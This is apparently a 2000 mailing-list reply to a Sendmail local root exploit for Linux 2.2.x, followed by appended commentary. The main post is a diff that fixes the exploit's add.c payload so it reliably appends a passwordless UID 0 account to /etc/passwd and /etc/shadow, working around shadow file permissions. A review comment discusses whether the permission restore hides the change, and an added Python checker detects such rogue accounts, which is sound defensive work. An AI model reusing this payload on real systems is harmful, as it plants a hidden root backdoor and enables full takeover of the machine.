Subject: Re: Sendmail local root exploit on linux 2.2.x
From: Mark K. Pettit (pettitYAHOO-INC.COM)
Date: Thu Jun 08 2000 - 14:18:44 CDT


>Hello all,
>
>Attached is a file with 2 sources, ex.c and add.c

This is a great exploit. It is a little broken, though. Here's a
patched version of the add.c script so that it is a little kinder and
works out of the box the first time.

The problem has to do with the permissions on the shadow file. If it's
installed with mode 400, the exploit will fail. There's also a \n left
out of the shadow line.

This patch fixes both of these problems. Yah, I know it's trivial, but
I wanted to be complete.

============================================================================
--- add.c.orig Thu Jun 8 11:32:33 2000
+++ add.c Thu Jun 8 11:21:15 2000
-1,17 +1,24
 #include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>

 int main (void) {
    int fd;
    char string[40];
+ struct stat buf;

    seteuid(0);
    fd = open("/etc/passwd", O_APPEND|O_WRONLY);
    strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
    write(fd, string, strlen(string));
    close(fd);
+ stat("/etc/shadow", &buf);
+ chmod("/etc/shadow", S_IRUSR|S_IWUSR);
    fd = open("/etc/shadow", O_APPEND|O_WRONLY);
- strcpy(string, "yomama::11029:0:99999:7:::");
+ strcpy(string, "yomama::11029:0:99999:7:::\n");
    write(fd, string, strlen(string));
    close(fd);
-
+ chmod("/etc/shadow", buf.st_mode);
 }
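Review bot: restoring only the permission bits with `chmod("/etc/shadow", buf.st_mode)` at the end of the hunk does not undo the evidence of the change: the appended records stay in both files, and the write() plus both chmod() calls each bump the ctime of /etc/shadow, so an integrity check that hashes /etc/passwd and /etc/shadow or compares their ctime to a baseline still sees the edit. Two smaller points on the same lines: `buf.st_mode` carries the file-type bits as well as the permission bits, so `buf.st_mode & 07777` states the intent more clearly even though chmod() ignores the extra bits; and the `stat()` and `chmod()` return values are never examined, so if stat() fails the later chmod() restores whatever garbage was in the uninitialised `buf.st_mode`. What the hunk as a whole demonstrates for the defensive side is that mode 0400 on /etc/shadow is not a control against a writer that already holds euid 0, since it can simply change the mode and change it back; the control that matters is the seteuid(0) path itself.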
============================================================================

--
Mark K. Pettit, CCNA                Do you, uh, Yahoo!?
pettityahoo-inc.com             Why, yes, I do, uh, Yahoo!
Technical Yahoo
Yahoo!, Inc., 3420 Central Expressway, Santa Clara, CA 95051
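As an added example that is not part of this post or of the attached ex.c/add.c, here is a small Python checker written from the defender's side of the same change: it parses passwd- and shadow-format records, flags any UID 0 account other than root and any empty password hash (exactly the artifacts the appended `yomama` lines above leave behind), reports malformed records such as the ones produced when the trailing newline is missing and the next record gets glued onto the previous line, and checks that the shadow file's owner and mode are what they should be. The sample file contents are constructed for the example, and the function and variable names are assumptions of this example rather than anything from the post.

```python
import os
import stat

# Constructed sample contents standing in for /etc/passwd and /etc/shadow,
# including the kind of appended root-equivalent entry discussed in the post.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
yomama:x:0:0::/root:/bin/sh
"""

SAMPLE_SHADOW = """root:$6$placeholderhash:11029:0:99999:7:::
daemon:*:11029:0:99999:7:::
alice:$6$placeholderhash:11029:0:99999:7:::
yomama::11029:0:99999:7:::
"""


def parse_colon_file(text, nfields):
    """Split colon-separated records; return (records, malformed_lines).

    A record with the wrong field count is reported rather than parsed, which
    is what happens when two entries are glued together by a missing newline.
    """
    records, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != nfields:
            malformed.append((lineno, line))
        else:
            records.append(fields)
    return records, malformed


def audit_accounts(passwd_text, shadow_text):
    """Return a list of human-readable findings about rogue or inconsistent accounts."""
    findings = []
    pw, pw_bad = parse_colon_file(passwd_text, 7)   # passwd has 7 fields
    sh, sh_bad = parse_colon_file(shadow_text, 9)   # shadow has 9 fields
    for lineno, line in pw_bad:
        findings.append(f"passwd line {lineno} malformed: {line!r}")
    for lineno, line in sh_bad:
        findings.append(f"shadow line {lineno} malformed: {line!r}")

    # Any UID 0 account that is not root is root-equivalent and a red flag.
    for name, _, uid, *_ in pw:
        if uid == "0" and name != "root":
            findings.append(f"extra UID 0 account: {name}")

    # An empty hash field in shadow means the account logs in with no password.
    shadow_names = set()
    for name, pwhash, *_ in sh:
        shadow_names.add(name)
        if pwhash == "":
            findings.append(f"empty password hash: {name}")

    # Every passwd entry should have a matching shadow entry.
    for name, *_ in pw:
        if name not in shadow_names:
            findings.append(f"passwd entry without shadow entry: {name}")

    # A file that does not end in a newline will glue the next appended record
    # onto its last line, which is the defect the post's patch corrects.
    if shadow_text and not shadow_text.endswith("\n"):
        findings.append("shadow does not end with newline")
    return findings


def shadow_mode_ok(st_mode, st_uid):
    """True if the file is root-owned and no group/other bits are set (0600 or stricter)."""
    return st_uid == 0 and (stat.S_IMODE(st_mode) & 0o077) == 0


def check_shadow_file(path="/etc/shadow"):
    """Apply shadow_mode_ok to a real file (needs permission to stat it)."""
    st = os.stat(path)
    return shadow_mode_ok(st.st_mode, st.st_uid)


if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(finding)
```

Running the module prints the two findings for the sample data (the extra UID 0 account and the empty hash, both for `yomama`). On a live system, pair `audit_accounts` on the real file contents with `check_shadow_file()` and a content hash of both files taken at a known-good time; the permission restore in the patch above does not hide the appended records, so the hash comparison is the check that catches this class of change.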